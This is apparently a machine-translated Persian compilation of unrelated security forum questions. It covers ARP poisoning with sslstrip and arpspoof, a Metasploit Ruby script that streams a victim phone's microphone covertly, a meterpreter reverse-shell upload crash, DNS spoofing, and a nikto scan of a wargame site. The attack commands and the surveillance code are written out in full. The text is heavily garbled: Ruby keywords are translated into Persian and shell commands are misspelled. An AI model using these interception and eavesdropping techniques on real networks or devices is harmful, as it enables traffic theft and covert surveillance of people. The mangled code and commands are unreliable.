دستور العمل مسمومیت ARP اینترنت قربانی را کاهش می دهد و قربانی دسترسی ندارد

من در حال حاضر در یک دوره CPEH ثبت نام کردم، آزمایشگاه 3 من، سمی آرپس بود. دستور من استفاده شده است

  echo -1> / proc / sys / met / ipv4 / ip_forward
iptables -t nat -A PREROUTING -p tcp --detination-port 80 -j REDIRECT -to- port 1000
برای پروتکل 443 هم همین کار را کرد
sslstrip -p -l 1000
arpspoof -i eth0 -t قربانی ip gateway
tail -f sslstrip.log

آنچه من اشتباه انجام می دهم هنگامی که من انجام می دهم، قربانی می تواند دیگر به شبکه خاتمه دهد

اندروید – نحوه پخش صوت از تلفن قربانی با اسکریپت metasploit ruby

من می خواهم جریان صوتی میکروفون را در metasploit مانند webcam_stream ایجاد کنم، بنابراین برخی از کدها را به اسکریپت ruby ​​اضافه کردم: (/ usr / share / metasploit-framework / lib / rex / post / meterpreter / ui / console / command_dispatcher / stdapi / webcam.rb )، قطعه کد اضافه شده است:

 def cmd_mic_stream (* args)

print_status ("شروع ...")
stream_path = Rex :: Text.rand_text_alpha (8) + ".wav"
player_path = Rex :: Text.rand_text_alpha (8) + ".html"
مدت زمان = 2
view = true
وقفه = 1800

record_mic_opts = Rex :: Parser :: Arguments.new (
  "-h" => [ false, "Help Banner" ]
  "-d" => [ true, "The stream duration in seconds (Default:2)" ]، # 1/30 دقیقه
  "-s" => [ true, "The stream file path (Default: '#{stream_path}')" ]
  "-t" => [ true, "The stream player path (Default: #{player_path})"]
  "-v" => [ true, "Automatically view the stream (Default: '#{view}')" ]
)

 record_mic_opts.parse (args) انجام دهید، _idx، val |
  انتخاب مورد
  وقتی "-h"
    print_line ("استفاده: record_mic [options]  n")
    print_line ("ضبط صدا از پیش فرض میکروفون")
    print_line (record_mic_opts.usage)
    برگشت
  وقتی "-d"
    مدت زمان = val.to_i
  وقتی "-s"
    stream_path = val
  وقتی "-t"
    player_path = val
  وقتی "-v"
    نمایش = true اگر val = ~ / ^ (f | n | 0) / i
  پایان
پایان

print_status ("آماده سازی بازیکن ...")
<! -
    html =٪ | 



 Metasploit webcam_stream - # {client.sock.peerhost} 




 هدف IP: # {client.sock.peerhost}
زمان شروع: # {Time.now}
وضعیت: 

www.metasploit.com


|
->

:: فایل.open (player_path، 'wb') do | f |
  f.write (html)
پایان
اگر دید
  print_status ("باز کردن بازیکن در: # {player_path}")
  Rex :: Compat.open_file (player_path)
چیز دیگری
  print_status ("لطفا به صورت دستی با مرورگر باز شود: # {player_path}")
پایان

print_status ("جریان ...")
شروع
  :: Timeout.timeout (timeout) انجام دهید
    در حالی که مشتری انجام می دهد
      data = client.webcam.record_mic (مدت زمان)
      اگر داده
         :: فایل.open (stream_path، 'wb') do | d |
         d.write (داده ها)
        پایان
        داده ها = nil
        خواب (5)
      پایان
    پایان
  پایان
نجات :: زمان بندی :: خطا
پایان

print_status ("متوقف شد")
پایان

شما ممکن است متوجه شوید که آن را به فرمان webcam_stream شبیه است، مشکل اینجاست که مرورگر باز می شود، وضعیت خروجی «پخش» می شود، اما صوتی چیزی را بازی نمی کند، فقط چیزی که ممکن است باعث آن شود خالی است؟

metasploit – آپلود فایل Meterpreter – تقسیم تقسیم بندی

من انجام برخی از آزمایش ها در دو VM، یک اجرا Kali و دیگری اجرا اوبونتو. من مشکل فرمان "آپلود" Meterpreter را دارم. به طور خاص، من قبلا یک session tcp معکوس با استفاده از linux / x86 / meterpreter_reverse_tcp loadload باز کرده و با استفاده از exploit / multi / handler exploit کار می کند.

هنگامی که جلسه در روشن است، من سعی کردم فایل file.sh را با استفاده از دستور "آپلود" آپلود کنم:

 metpreter> upload kali / path / to / file.sh ubuntu / destination / path

آنچه در Vali Kali دریافت می کنم:

 [*] uploading: kali / path / to / file.sh -> ubuntu / destination / path
[*] 10.0.2.15 - جلسه Meterpreter 3 بسته شد. دلیل: مرده

در VM ubuntu یک خطای جداسازی گسل دریافت می شود.
تمام دستورات مترpreter دیگر کار می کنند (حتی یک بار دانلود).
آیا کسی میتواند به من در درک مشکل کمک کند؟

کالی لینوکس – dnsspoof درخواست DNS را با IP آدرس ماشین محلی فریب نمی دهد

من می خواهم تمام درخواست های DNS را با آدرس آی پی ماشین محلی من تقلید کنم.

با این حال، در حال اجرا dnsspoof ، تمام مشتریان آدرس IP واقعی را دریافت می کنند و نه آدرس IP جعلی میزبان من.

من می توانم از -f گزینه dnsspoof را اجرا کنم. اما در این مورد، من فقط میخواهم تمام درخواستهای DNS را با همان آدرس میزبان محلی من را فریب دهم.

هر ایده؟

 root @ kali: ~ # dnsspoof -i wlan0
dnsspoof: گوش دادن به wlan0 [udp dst port 53 and not src 192.168.1.1]
192.168.1.106.51298> 192.168.1.1.53: 21993+ A؟ api-glb-bln.smoot.apple.com
192.168.1.106.60866> 192.168.1.1.53: 65045+ A؟ p09-keyvalueservice.fe.apple-dns.net
192.168.1.106.55219> 192.168.1.1.53: 29989+ A؟ clients1.google.com
192.168.1.106.60383> 192.168.1.1.53: 53500+ A؟ gateway.fe.apple-dns.net
192.168.1.106.58017> 192.168.1.1.53: 51772+ A؟ tv2.dk
192.168.1.106.49725> 192.168.1.1.53: 43764+ A؟ assets.adobedtm.com
192.168.1.106.49286> 192.168.1.1.53: 39396+ A؟ shared.tv2.dk
192.168.1.106.59361> 192.168.1.1.53: 45196+ A؟ tv2login.dk
192.168.1.106.59450> 192.168.1.1.53: 61943+ A؟ platform.twitter.com
192.168.1.106.51695> 192.168.1.1.53: 64740+ A؟ cdn.optimizely.com
192.168.1.106.62386> 192.168.1.1.53: 2942+ A؟ static.chartbeat.com

نرم افزار وب – احراز هویت نیکو

من سعی می کنم یک بازی جنگی بر روی هک های ناشی از جهنم را تکمیل کنم.

من مایل به استفاده از اسکنر nikto برای چک کردن برخی صفحات برای آسیب پذیری ها هستم، اما برای اولین بار باید وارد بازی جنگ هک شدگان هکرها شدم و سپس شروع شد اسکن قلم آزمون 1 چالش

در اینجا URL مربوط به چالش خاص:

https://www.hellboundhackers.org/challenges/pentest/pentest1/index.php

فرمان من در حال تلاش برای استفاده از این، با این حال اسکنر در حال حرکت به سمت صفحه فهرست است https://www.hellboundhackers.org که ناامید کننده است به عنوان من می خواهم برای اسکن /challenge/pentest/pentest1/index.php . من معتقدم که این به این دلیل است که بخشی از احراز هویت -id + به درستی کار نمی کند؟

 nikto -ssl -id username: password -h https://www.hellboundhackers.org/challenges/pentest/pentest1/ index.php؟

متشکرم.